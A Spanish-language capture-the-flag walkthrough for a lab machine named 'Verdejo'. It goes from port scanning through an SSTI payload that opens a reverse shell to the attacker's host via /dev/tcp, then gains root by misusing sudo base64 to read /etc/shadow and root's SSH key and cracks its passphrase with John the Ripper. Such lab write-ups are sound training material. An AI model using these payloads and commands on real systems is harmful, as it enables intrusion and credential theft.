Verdejo

✍️ Autor: The Hacker Labs🔍 Dificultad: Fácil 📅 Fecha de creación: 22/05/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP y el puerto 8089 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80,8089 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea la de por defecto de Apache.

Vemos a ver que corre por el puerto 8089.

Si enviamos el texto nos sale esto.

🚀 EXPLOTACIÓN

Comenzamos verificando si es posible ejecutar un ataque XSS.

<script>alert("hacked")</script>

Probamos si es propenso a un SSTI por lo que realizamos una operación matemática que deberá mostrar el resultado.

{{7*7}}

Por lo que aprovechamos eso para enviarnos una Reverse Shell.

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.255.136/443 0>&1\'').read() }}

Nos ponemos en escucha.

nc -lvnp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Tenemos permisos SUDO con base64 por lo que revisamos esta página para escalar privilegios.

sudo base64 /etc/shadow | base64 --decode

Durante el escaneo, notamos que el puerto SSH estaba abierto. Esto sugiere la posibilidad de que el usuario root tenga un archivo id_rsa. Al intentar leer este archivo utilizando la ruta predeterminada, confirmamos que efectivamente obtuvimos el id_rsa.

sudo base64 /root/.ssh/id_rsa | base64 --decode

Transferimos el archivo a nuestra máquina local y, tras asignarle permisos de ejecución, intentamos establecer la conexión. Sin embargo, se nos solicitó la contraseña asociada al id_rsa.

chmod 600 id_rsa

En este paso, utilizamos ssh2john para extraer el hash del archivo. Posteriormente, empleamos John the Ripper para descifrar la contraseña, siempre que esta se encuentre en nuestro diccionario. Después de un tiempo, logramos identificar la clave

ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Nos logueamos y metemos las credenciales. Ya somos root.